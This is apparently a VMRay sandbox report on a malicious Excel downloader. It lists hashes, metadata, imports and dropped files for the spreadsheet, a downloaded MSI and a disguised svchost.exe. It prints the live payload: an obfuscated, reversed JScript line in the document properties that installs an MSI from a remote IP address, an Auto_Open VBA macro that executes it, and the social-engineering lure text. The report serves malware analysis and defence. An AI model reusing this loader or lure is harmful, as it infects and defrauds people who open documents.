Try VMRay Platform
Malicious
Classifications

Downloader Dropper

Threat Names

VB:Trojan.Valyria.5362 Trojan.Zmutzy.Hory.1

Dynamic Analysis Report

Created on 2021-10-01T14:48:00

f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls

Excel Document
...

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "12 minutes" to "30 seconds" to reveal dormant functionality.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls Sample File Excel Document
malicious
...
»
MIME Type application/vnd.ms-excel
File Size 270.00 KB
MD5 96417179582f29ed95c5719e60203d61 Copy to Clipboard
SHA1 5e7781903f5a0c67318db9edccc60e5c8071a73e Copy to Clipboard
SHA256 f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2 Copy to Clipboard
SSDeep 6144:2cKoSsxzNDZL2Qiw+4868O8K/5Le+k3hbdlylKsgqopeJBWhZFVE+W2NdA9ZFfsh:r0IJIQJJ6MuDQIG7E6Sr Copy to Clipboard
ImpHash -
AV Matches (1)
»
Threat Name Verdict
VB:Trojan.Valyria.5362
malicious
Office Information
»
Subject JScript
Description eval('})"28.831.612.59//:ptth"(tcudorPllatsnI;2=leveLIU{))"rellatsnI.rellatsnIswodniW"(tcejbOXevitcA wen(htiw'.split('').reverse().join(''))
Creator Ferop
Last Modified By Administrator
Create Time 2021-08-17 12:24:08+00:00
Modify Time 2021-10-01 13:01:11+00:00
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 16.0
Document Security NONE
Titles Of Parts Sheet1
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
VBA Macros (1)
»
Macro #1: Module1
» 
Attribute VB_Name = "Module1"
Function Auto_Open()
    Dim a As New ScriptControl
    a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value
    a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value)
End Function
Extracted Image Texts (1)
»
Image 1: 0.PNG
»
This document is protected by the Microsoft 1. Open the document in Microsoft office. Previewing online is not available for protected documents. 2. If this document was downloaded from your email, please click Enable Editing from the yellow bar above. 3. Once you have enabled editing, please click Enable Content from the yellow bar above. Attention! We never ask for any confidential information for decryption! Please be aware!
CFB Streams (15)
»
Name ID Size Actions
Root\Workbook 1 252.86 KB
...
Root\_VBA_PROJECT_CUR\VBA\dir 4 709 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\Sheet1 5 977 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\Module1 6 1.24 KB
...
Root\_VBA_PROJECT_CUR\VBA\__SRP_0 7 1.27 KB
...
Root\_VBA_PROJECT_CUR\VBA\__SRP_1 8 74 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\__SRP_2 9 84 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\__SRP_3 10 103 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook 11 985 Bytes
...
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT 12 2.88 KB
...
Root\_VBA_PROJECT_CUR\PROJECT 13 479 Bytes
...
Root\_VBA_PROJECT_CUR\PROJECTwm 14 86 Bytes
...
Root\SummaryInformation 15 400 Bytes
...
Root\DocumentSummaryInformation 16 244 Bytes
...
Root\CompObj 17 108 Bytes
...
filter.msi Downloaded File MSI
malicious
...
»
Also Known As C:\Windows\Installer\MSI5864.tmp (Downloaded File)
Parent File analysis.pcap
MIME Type application/x-msi
File Size 184.00 KB
MD5 84ec41afdc49c2ee8dff9ba07ba5c9a4 Copy to Clipboard
SHA1 cd33ef1a43ad7f20471f876bd24441ee20b475af Copy to Clipboard
SHA256 83e4c90dc8bc1c53a4000bef83a355c4e36d2a1ba4a5d0982bc5b9b350278f1f Copy to Clipboard
SSDeep 3072:hbwvxMbpo9fp9XhyyRi+qsEUr9+KobGJDOoSf8MmMw3gS/8TOC3h8p:hbwvxRxNRi+qsEg+77nHS/Ze8p Copy to Clipboard
ImpHash -
AV Matches (1)
»
Threat Name Verdict
Trojan.Zmutzy.Hory.1
malicious
C:\ProgramData\Excel\svchost.exe Dropped File Binary
suspicious
Lowered to Suspicious because the artifact is known to be Clean or Trusted.
...
»
MIME Type application/vnd.microsoft.portable-executable
File Size 288.00 KB
MD5 6c14b77096d4d6bfbe97f93411103e72 Copy to Clipboard
SHA1 af1c6129ef6bbc51b31c6cc64799cc6299047a39 Copy to Clipboard
SHA256 e95681e20ab19a50abdacd73c7d9eac9cfec7d949a23b8346b84d8f4bc493ca5 Copy to Clipboard
SSDeep 6144:KXvVGqCwiNhEKO/lMiVQTJyCICldgAO9y:IHCwiNhErCluS Copy to Clipboard
ImpHash 7f7ccd5a4f25c1cac7831d174e43cc3d Copy to Clipboard
PE Information
»
Image Base 0x400000
Entry Point 0x424759
Size Of Code 0x37000
Size Of Initialized Data 0x10000
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2007-10-02 06:00:55+00:00
Version Information (10)
»
Comments KiXtart 2010 CareWare
CompanyName Ruud van Velsen (Microsoft)
FileDescription KiXtart main executable
FileVersion 4, 60, 0, 0
InternalName KIX32
LegalCopyright Copyright Ruud van Velsen 2007
OriginalFilename KIX32.EXE
ProductName KiXtart 2010
ProductVersion 4.60
SpecialBuild Build 250
Sections (4)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x36546 0x37000 0x1000 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.62
.rdata 0x438000 0xb8ce 0xc000 0x38000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 6.01
.data 0x444000 0x1ef3c 0x3000 0x44000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.32
.rsrc 0x463000 0x80c 0x1000 0x47000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.04
Imports (10)
»
NETAPI32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
Netbios - 0x43831c 0x424ec 0x424ec 0x108
MPR.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WNetGetUserA - 0x438300 0x424d0 0x424d0 0x3d
WNetUseConnectionA - 0x438304 0x424d4 0x424d4 0x4c
WNetOpenEnumA - 0x438308 0x424d8 0x424d8 0x40
WNetEnumResourceA - 0x43830c 0x424dc 0x424dc 0x1c
WNetCancelConnection2A - 0x438310 0x424e0 0x424e0 0xc
WNetCloseEnum - 0x438314 0x424e4 0x424e4 0x11
WINMM.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
sndPlaySoundA - 0x438414 0x425e4 0x425e4 0x9c
PlaySoundA - 0x438418 0x425e8 0x425e8 0xa
VERSION.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFileVersionInfoSizeA - 0x438404 0x425d4 0x425d4 0x1
GetFileVersionInfoA - 0x438408 0x425d8 0x425d8 0x0
VerQueryValueA - 0x43840c 0x425dc 0x425dc 0xa
KERNEL32.dll (146)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetTickCount - 0x4380b4 0x42284 0x42284 0x1df
GetCurrentProcessId - 0x4380b8 0x42288 0x42288 0x143
GetConsoleTitleA - 0x4380bc 0x4228c 0x4228c 0x139
SetConsoleMode - 0x4380c0 0x42290 0x42290 0x2fd
GetConsoleMode - 0x4380c4 0x42294 0x42294 0x133
GetStdHandle - 0x4380c8 0x42298 0x42298 0x1b9
GetConsoleScreenBufferInfo - 0x4380cc 0x4229c 0x4229c 0x137
SetConsoleTextAttribute - 0x4380d0 0x422a0 0x422a0 0x305
SetConsoleCursorInfo - 0x4380d4 0x422a4 0x422a4 0x2f0
GetConsoleCursorInfo - 0x4380d8 0x422a8 0x422a8 0x128
AllocConsole - 0x4380dc 0x422ac 0x422ac 0xa
SetConsoleCursorPosition - 0x4380e0 0x422b0 0x422b0 0x2f2
WriteFile - 0x4380e4 0x422b4 0x422b4 0x3a4
FlushConsoleInputBuffer - 0x4380e8 0x422b8 0x422b8 0xed
FillConsoleOutputAttribute - 0x4380ec 0x422bc 0x422bc 0xc6
FillConsoleOutputCharacterA - 0x4380f0 0x422c0 0x422c0 0xc7
WriteConsoleW - 0x4380f4 0x422c4 0x422c4 0x3a3
WriteConsoleA - 0x4380f8 0x422c8 0x422c8 0x399
ReadConsoleA - 0x4380fc 0x422cc 0x422cc 0x2a9
LocalFree - 0x438100 0x422d0 0x422d0 0x25c
FormatMessageA - 0x438104 0x422d4 0x422d4 0xf3
WriteProfileStringA - 0x438108 0x422d8 0x422d8 0x3b0
GetProfileStringA - 0x43810c 0x422dc 0x422dc 0x1b2
GetPrivateProfileStringA - 0x438110 0x422e0 0x422e0 0x19c
GetCurrentThreadId - 0x438114 0x422e4 0x422e4 0x146
SetLastError - 0x438118 0x422e8 0x422e8 0x328
SetSystemPowerState - 0x43811c 0x422ec 0x422ec 0x339
GetCurrentProcess - 0x438120 0x422f0 0x422f0 0x142
SetFilePointer - 0x438124 0x422f4 0x422f4 0x31b
CreateFileA - 0x438128 0x422f8 0x422f8 0x53
GetFileSize - 0x43812c 0x422fc 0x422fc 0x163
GlobalMemoryStatus - 0x438130 0x42300 0x42300 0x204
GetDiskFreeSpaceA - 0x438134 0x42304 0x42304 0x14d
CompareFileTime - 0x438138 0x42308 0x42308 0x39
SystemTimeToTzSpecificLocalTime - 0x43813c 0x4230c 0x4230c 0x35c
FileTimeToSystemTime - 0x438140 0x42310 0x42310 0xc5
FileTimeToLocalFileTime - 0x438144 0x42314 0x42314 0xc4
GetModuleHandleA - 0x438148 0x42318 0x42318 0x17f
GlobalFree - 0x43814c 0x4231c 0x4231c 0x1ff
GetCommandLineW - 0x438150 0x42320 0x42320 0x111
GetCommandLineA - 0x438154 0x42324 0x42324 0x110
SystemTimeToFileTime - 0x438158 0x42328 0x42328 0x35b
GetSystemTime - 0x43815c 0x4232c 0x4232c 0x1c8
GetFullPathNameA - 0x438160 0x42330 0x42330 0x169
GetEnvironmentVariableW - 0x438164 0x42334 0x42334 0x159
lstrcatW - 0x438168 0x42338 0x42338 0x3be
lstrcpyW - 0x43816c 0x4233c 0x4233c 0x3c7
SetSystemTime - 0x438170 0x42340 0x42340 0x33a
GetComputerNameA - 0x438174 0x42344 0x42344 0x114
GetSystemDirectoryA - 0x438178 0x42348 0x42348 0x1c1
GetShortPathNameA - 0x43817c 0x4234c 0x4234c 0x1b5
SetConsoleTitleA - 0x438180 0x42350 0x42350 0x306
GetEnvironmentVariableA - 0x438184 0x42354 0x42354 0x158
GetUserDefaultLCID - 0x438188 0x42358 0x42358 0x1e3
GetLocaleInfoA - 0x43818c 0x4235c 0x4235c 0x174
GetSystemDefaultLCID - 0x438190 0x42360 0x42360 0x1be
GetCurrentDirectoryA - 0x438194 0x42364 0x42364 0x140
GetLocalTime - 0x438198 0x42368 0x42368 0x173
GetWindowsDirectoryA - 0x43819c 0x4236c 0x4236c 0x1f3
GetTempPathA - 0x4381a0 0x42370 0x42370 0x1d5
GetVersionExA - 0x4381a4 0x42374 0x42374 0x1e9
RaiseException - 0x4381a8 0x42378 0x42378 0x2a7
WideCharToMultiByte - 0x4381ac 0x4237c 0x4237c 0x394
QueryPerformanceCounter - 0x4381b0 0x42380 0x42380 0x2a3
GetEnvironmentStringsW - 0x4381b4 0x42384 0x42384 0x157
FreeEnvironmentStringsW - 0x4381b8 0x42388 0x42388 0xf7
GetEnvironmentStrings - 0x4381bc 0x4238c 0x4238c 0x155
FreeEnvironmentStringsA - 0x4381c0 0x42390 0x42390 0xf6
HeapSize - 0x4381c4 0x42394 0x42394 0x21c
GetStringTypeW - 0x4381c8 0x42398 0x42398 0x1bd
GetStringTypeA - 0x4381cc 0x4239c 0x4239c 0x1ba
IsValidLocale - 0x4381d0 0x423a0 0x423a0 0x241
EnumSystemLocalesA - 0x4381d4 0x423a4 0x423a4 0xaf
GetConsoleOutputCP - 0x4381d8 0x423a8 0x423a8 0x135
SetHandleCount - 0x4381dc 0x423ac 0x423ac 0x324
VirtualAlloc - 0x4381e0 0x423b0 0x423b0 0x381
VirtualFree - 0x4381e4 0x423b4 0x423b4 0x383
HeapCreate - 0x4381e8 0x423b8 0x423b8 0x212
HeapDestroy - 0x4381ec 0x423bc 0x423bc 0x214
RtlUnwind - 0x4381f0 0x423c0 0x423c0 0x2d7
LCMapStringW - 0x4381f4 0x423c4 0x423c4 0x245
LCMapStringA - 0x4381f8 0x423c8 0x423c8 0x244
InitializeCriticalSection - 0x4381fc 0x423cc 0x423cc 0x223
LoadLibraryA - 0x438200 0x423d0 0x423d0 0x252
DeleteCriticalSection - 0x438204 0x423d4 0x423d4 0x81
TlsFree - 0x438208 0x423d8 0x423d8 0x364
TlsSetValue - 0x43820c 0x423dc 0x423dc 0x366
TlsAlloc - 0x438210 0x423e0 0x423e0 0x363
TlsGetValue - 0x438214 0x423e4 0x423e4 0x365
IsValidCodePage - 0x438218 0x423e8 0x423e8 0x23f
InterlockedIncrement - 0x43821c 0x423ec 0x423ec 0x22c
GetOEMCP - 0x438220 0x423f0 0x423f0 0x193
GetACP - 0x438224 0x423f4 0x423f4 0xfd
GetCPInfo - 0x438228 0x423f8 0x423f8 0x104
IsDebuggerPresent - 0x43822c 0x423fc 0x423fc 0x239
SetUnhandledExceptionFilter - 0x438230 0x42400 0x42400 0x34a
UnhandledExceptionFilter - 0x438234 0x42404 0x42404 0x36e
TerminateProcess - 0x438238 0x42408 0x42408 0x35e
SetConsoleCtrlHandler - 0x43823c 0x4240c 0x4240c 0x2ee
Beep - 0x438240 0x42410 0x42410 0x1f
MultiByteToWideChar - 0x438244 0x42414 0x42414 0x275
Sleep - 0x438248 0x42418 0x42418 0x356
WaitForSingleObject - 0x43824c 0x4241c 0x4241c 0x390
GetExitCodeProcess - 0x438250 0x42420 0x42420 0x15a
SetEnvironmentVariableA - 0x438254 0x42424 0x42424 0x313
CreateProcessA - 0x438258 0x42428 0x42428 0x66
ReadFile - 0x43825c 0x4242c 0x4242c 0x2b5
CloseHandle - 0x438260 0x42430 0x42430 0x34
FindFirstFileA - 0x438264 0x42434 0x42434 0xd2
GetFileAttributesA - 0x438268 0x42438 0x42438 0x15e
CreateDirectoryA - 0x43826c 0x4243c 0x4243c 0x4b
RemoveDirectoryA - 0x438270 0x42440 0x42440 0x2c4
FindNextFileA - 0x438274 0x42444 0x42444 0xdc
FindClose - 0x438278 0x42448 0x42448 0xce
MoveFileA - 0x43827c 0x4244c 0x4244c 0x26e
CopyFileA - 0x438280 0x42450 0x42450 0x43
WritePrivateProfileStringA - 0x438284 0x42454 0x42454 0x3a9
LoadLibraryExA - 0x438288 0x42458 0x42458 0x253
GetProcAddress - 0x43828c 0x4245c 0x4245c 0x1a0
FreeLibrary - 0x438290 0x42460 0x42460 0xf8
SetCurrentDirectoryA - 0x438294 0x42464 0x42464 0x30a
GetModuleFileNameA - 0x438298 0x42468 0x42468 0x17d
DeleteFileA - 0x43829c 0x4246c 0x4246c 0x83
GetLastError - 0x4382a0 0x42470 0x42470 0x171
SetFileAttributesA - 0x4382a4 0x42474 0x42474 0x319
GetSystemInfo - 0x4382a8 0x42478 0x42478 0x1c5
GetSystemTimeAsFileTime - 0x4382ac 0x4247c 0x4247c 0x1ca
GetConsoleCP - 0x4382b0 0x42480 0x42480 0x122
GetLocaleInfoW - 0x4382b4 0x42484 0x42484 0x175
FlushFileBuffers - 0x4382b8 0x42488 0x42488 0xee
SetEndOfFile - 0x4382bc 0x4248c 0x4248c 0x310
GetFileType - 0x4382c0 0x42490 0x42490 0x166
SetStdHandle - 0x4382c4 0x42494 0x42494 0x337
LeaveCriticalSection - 0x4382c8 0x42498 0x42498 0x251
EnterCriticalSection - 0x4382cc 0x4249c 0x4249c 0x98
GetNumberOfConsoleInputEvents - 0x4382d0 0x424a0 0x424a0 0x191
PeekConsoleInputA - 0x4382d4 0x424a4 0x424a4 0x28f
ReadConsoleInputA - 0x4382d8 0x424a8 0x424a8 0x2aa
HeapFree - 0x4382dc 0x424ac 0x424ac 0x216
SetLocalTime - 0x4382e0 0x424b0 0x424b0 0x32b
GetStartupInfoA - 0x4382e4 0x424b4 0x424b4 0x1b7
GetProcessHeap - 0x4382e8 0x424b8 0x424b8 0x1a3
HeapReAlloc - 0x4382ec 0x424bc 0x424bc 0x21a
HeapAlloc - 0x4382f0 0x424c0 0x424c0 0x210
InterlockedDecrement - 0x4382f4 0x424c4 0x424c4 0x228
ExitProcess - 0x4382f8 0x424c8 0x424c8 0xb9
USER32.dll (36)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
MessageBoxA - 0x438370 0x42540 0x42540 0x1df
SendMessageTimeoutA - 0x438374 0x42544 0x42544 0x23e
ExitWindowsEx - 0x438378 0x42548 0x42548 0xe1
RemoveMenu - 0x43837c 0x4254c 0x4254c 0x22b
EnableMenuItem - 0x438380 0x42550 0x42550 0xc2
ShowWindow - 0x438384 0x42554 0x42554 0x292
FindWindowA - 0x438388 0x42558 0x42558 0xe3
SetWindowPos - 0x43838c 0x4255c 0x4255c 0x283
GetWindowRect - 0x438390 0x42560 0x42560 0x174
SetForegroundWindow - 0x438394 0x42564 0x42564 0x257
GetSystemMenu - 0x438398 0x42568 0x42568 0x15c
VkKeyScanA - 0x43839c 0x4256c 0x4256c 0x2c6
keybd_event - 0x4383a0 0x42570 0x42570 0x2d5
MapVirtualKeyA - 0x4383a4 0x42574 0x42574 0x1d6
DdeDisconnect - 0x4383a8 0x42578 0x42578 0x70
DdeInitializeA - 0x4383ac 0x4257c 0x4257c 0x79
DdeCreateStringHandleA - 0x4383b0 0x42580 0x42580 0x6e
DdeConnect - 0x4383b4 0x42584 0x42584 0x6b
DdeFreeStringHandle - 0x4383b8 0x42588 0x42588 0x74
DdeUninitialize - 0x4383bc 0x4258c 0x4258c 0x86
GetSystemMetrics - 0x4383c0 0x42590 0x42590 0x15d
OemToCharA - 0x4383c4 0x42594 0x42594 0x1f1
SetTimer - 0x4383c8 0x42598 0x42598 0x27a
KillTimer - 0x4383cc 0x4259c 0x4259c 0x1b5
GetActiveWindow - 0x4383d0 0x425a0 0x425a0 0xeb
EndDialog - 0x4383d4 0x425a4 0x425a4 0xc6
EnumWindows - 0x4383d8 0x425a8 0x425a8 0xde
EnumChildWindows - 0x4383dc 0x425ac 0x425ac 0xcb
GetWindowTextA - 0x4383e0 0x425b0 0x425b0 0x177
GetWindowThreadProcessId - 0x4383e4 0x425b4 0x425b4 0x17b
AttachThreadInput - 0x4383e8 0x425b8 0x425b8 0xb
SetFocus - 0x4383ec 0x425bc 0x425bc 0x256
SystemParametersInfoA - 0x4383f0 0x425c0 0x425c0 0x299
SendMessageA - 0x4383f4 0x425c4 0x425c4 0x23b
CharToOemA - 0x4383f8 0x425c8 0x425c8 0x30
DdeClientTransaction - 0x4383fc 0x425cc 0x425cc 0x69
WINSPOOL.DRV (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddPrinterConnectionA - 0x438420 0x425f0 0x425f0 0x11
DeletePrinterConnectionA - 0x438424 0x425f4 0x425f4 0x31
ADVAPI32.dll (44)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegUnLoadKeyA - 0x438000 0x421d0 0x421d0 0x207
RegSaveKeyA - 0x438004 0x421d4 0x421d4 0x1fe
RegRestoreKeyA - 0x438008 0x421d8 0x421d8 0x1fc
RegConnectRegistryA - 0x43800c 0x421dc 0x421dc 0x1cc
RegQueryInfoKeyA - 0x438010 0x421e0 0x421e0 0x1f1
RegEnumKeyExA - 0x438014 0x421e4 0x421e4 0x1de
RegDeleteKeyA - 0x438018 0x421e8 0x421e8 0x1d4
RegEnumKeyA - 0x43801c 0x421ec 0x421ec 0x1dd
LookupAccountSidW - 0x438020 0x421f0 0x421f0 0x14a
GetSidIdentifierAuthority - 0x438024 0x421f4 0x421f4 0x116
GetSidSubAuthorityCount - 0x438028 0x421f8 0x421f8 0x119
GetSidSubAuthority - 0x43802c 0x421fc 0x421fc 0x118
GetTokenInformation - 0x438030 0x42200 0x42200 0x11a
RegDeleteValueA - 0x438034 0x42204 0x42204 0x1d8
RegEnumValueA - 0x438038 0x42208 0x42208 0x1e1
RegSetValueExA - 0x43803c 0x4220c 0x4220c 0x204
RegOpenKeyExA - 0x438040 0x42210 0x42210 0x1ec
RegCloseKey - 0x438044 0x42214 0x42214 0x1cb
RegCreateKeyExA - 0x438048 0x42218 0x42218 0x1d1
RegQueryValueExA - 0x43804c 0x4221c 0x4221c 0x1f7
AllocateAndInitializeSid - 0x438050 0x42220 0x42220 0x1d
LookupAccountSidA - 0x438054 0x42224 0x42224 0x149
FreeSid - 0x438058 0x42228 0x42228 0xe2
ClearEventLogA - 0x43805c 0x4222c 0x4222c 0x39
OpenEventLogA - 0x438060 0x42230 0x42230 0x1aa
BackupEventLogA - 0x438064 0x42234 0x42234 0x21
RegisterEventSourceA - 0x438068 0x42238 0x42238 0x209
ReportEventA - 0x43806c 0x4223c 0x4223c 0x214
DeregisterEventSource - 0x438070 0x42240 0x42240 0xb0
InitiateSystemShutdownA - 0x438074 0x42244 0x42244 0x136
AdjustTokenPrivileges - 0x438078 0x42248 0x42248 0x1c
OpenProcessToken - 0x43807c 0x4224c 0x4224c 0x1ac
LookupPrivilegeValueA - 0x438080 0x42250 0x42250 0x14f
CryptDecrypt - 0x438084 0x42254 0x42254 0x89
CryptDeriveKey - 0x438088 0x42258 0x42258 0x8a
CryptEncrypt - 0x43808c 0x4225c 0x4225c 0x8f
CryptDestroyKey - 0x438090 0x42260 0x42260 0x8c
CryptCreateHash - 0x438094 0x42264 0x42264 0x88
CryptHashData - 0x438098 0x42268 0x42268 0x9d
CryptGetHashParam - 0x43809c 0x4226c 0x4226c 0x99
CryptDestroyHash - 0x4380a0 0x42270 0x42270 0x8b
CryptReleaseContext - 0x4380a4 0x42274 0x42274 0xa0
CryptAcquireContextA - 0x4380a8 0x42278 0x42278 0x85
RegLoadKeyA - 0x4380ac 0x4227c 0x4227c 0x1e7
ole32.dll (7)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
MkParseDisplayName - 0x43842c 0x425fc 0x425fc 0xcd
BindMoniker - 0x438430 0x42600 0x42600 0x0
CLSIDFromProgID - 0x438434 0x42604 0x42604 0x6
CoCreateInstance - 0x438438 0x42608 0x42608 0x10
OleBuildVersion - 0x43843c 0x4260c 0x4260c 0xd0
OleInitialize - 0x438440 0x42610 0x42610 0xee
CreateBindCtx - 0x438444 0x42614 0x42614 0x76
OLEAUT32.dll (18)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SafeArrayCreate 0xf 0x438324 0x424f4 0x424f4 -
SysFreeString 0x6 0x438328 0x424f8 0x424f8 -
SafeArrayPutElement 0x1a 0x43832c 0x424fc 0x424fc -
SafeArrayGetElement 0x19 0x438330 0x42500 0x42500 -
SafeArrayGetUBound 0x13 0x438334 0x42504 0x42504 -
SysAllocString 0x2 0x438338 0x42508 0x42508 -
LHashValOfNameSys 0xa5 0x43833c 0x4250c 0x4250c -
SysAllocStringLen 0x4 0x438340 0x42510 0x42510 -
SafeArrayGetDim 0x11 0x438344 0x42514 0x42514 -
SafeArrayPtrOfIndex 0x94 0x438348 0x42518 0x42518 -
VariantChangeType 0xc 0x43834c 0x4251c 0x4251c -
SafeArrayRedim 0x28 0x438350 0x42520 0x42520 -
SysAllocStringByteLen 0x96 0x438354 0x42524 0x42524 -
VariantCopy 0xa 0x438358 0x42528 0x42528 -
SafeArrayAccessData 0x17 0x43835c 0x4252c 0x4252c -
SafeArrayUnaccessData 0x18 0x438360 0x42530 0x42530 -
VariantInit 0x8 0x438364 0x42534 0x42534 -
VariantClear 0x9 0x438368 0x42538 0x42538 -
Memory Dumps (2)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
svchost.exe 4 0x00400000 0x00463FFF Relevant Image False 32-bit 0x004268CC False False
...
svchost.exe 4 0x00400000 0x00463FFF Process Termination False 32-bit - False False
...
C:\Config.Msi\MSI76EE.tmp Dropped File Unknown
clean
...
  • Actions
»
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\desktop.ini Dropped File Unknown
clean
Known to be clean.
...
»
Also Known As c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\purlac7n\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\nl7ebwmb\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\1f2c20ea\desktop.ini (Dropped File)
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\wwbelx3i\desktop.ini (Dropped File)
MIME Type application/x-wine-extension-ini
File Size 67 Bytes
MD5 4a3deb274bb5f0212c2419d3d8d08612 Copy to Clipboard
SHA1 fa52f823b821155cf0ec527d52ce9b1390ec615e Copy to Clipboard
SHA256 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38 Copy to Clipboard
SSDeep 3:0NdQDjo8hzUzYcB:0NwosUzxB Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df7f5127fbd2e163a7.tmp Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 68.00 KB
MD5 fa78853fb23c21cc9881c64bee30b180 Copy to Clipboard
SHA1 3a221c3f6a87cd1651d28484ccf1e0f93e2aacff Copy to Clipboard
SHA256 b224d131393fcdad9ee67de310007693e77bc4249f091128848a24f80787e375 Copy to Clipboard
SSDeep 24:TWhilRc5+gipV8+gipV7V8nZgNlGisGgSi+R3rVZk/+z:TgilRJgSFgS5GnqluSi+PuS Copy to Clipboard
ImpHash -
C:\ProgramData\Excel\svchost.bin Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 1.41 KB
MD5 a176738655f7bd7270aa086db0f35451 Copy to Clipboard
SHA1 83396ccc22aa5e5aa3d697f8fba5a5eac3c9b0ae Copy to Clipboard
SHA256 d0d415dbe02e893fb1b2d6112c0f38d8ce65ab3268c896bfc64ba06096d4d09a Copy to Clipboard
SSDeep 24:g38XAfn03kz/Ht/rfVd9mPROB16SpuRz+Ui3q/OZd5VOnxHW5DSuD1ebzZfHHBE:l4n032VJJMl+a/Otmx8DwfdS Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\~df7732985c63e77b30.tmp Dropped File Stream
clean
Known to be clean.
...
»
MIME Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\desktop.ini Dropped File Unknown
clean
Known to be clean.
...
»
MIME Type application/x-wine-extension-ini
File Size 145 Bytes
MD5 ba96961f5e22882527919e19daea510f Copy to Clipboard
SHA1 e10e8bebbd0573e3a1494ea3f21682f7490c427b Copy to Clipboard
SHA256 dace5ad59099429d8aed4ee279f1263efb65d64456931398465a396cf0e79bd7 Copy to Clipboard
SSDeep 3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovZeLhzUzYcB:0NwoyAXNxW28CEI7QyyZeNUzxB Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\index.dat Dropped File Stream
clean
Known to be clean.
...
»
Also Known As c:\users\keecfmwgj\appdata\local\temp\cookies\index.dat (Dropped File)
MIME Type application/octet-stream
File Size 16.00 KB
MD5 d7a950fefd60dbaa01df2d85fefb3862 Copy to Clipboard
SHA1 15740b197555ba8e162c37a60ba655151e3bebae Copy to Clipboard
SHA256 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a Copy to Clipboard
SSDeep 3:qRFiJ2totWIlXllll:qjyx Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 16.00 KB
MD5 db08e8582979fd86edd933b68c5bddcb Copy to Clipboard
SHA1 2af472ff383e64ac73102470b255f3f0c0896b73 Copy to Clipboard
SHA256 da13a12ec78189db7923748d22a2062d0cf9cf09085ab8c901e78b13b102d5fb Copy to Clipboard
SSDeep 3:qRFiJ2totWIlXllll5llqKZ4IEj+toXl:qjyx4npjqk Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 16.00 KB
MD5 7aeb69e984857bb6b1f2a34b5594c092 Copy to Clipboard
SHA1 80b911ba5525506db5833318f1c80a75982dfcfb Copy to Clipboard
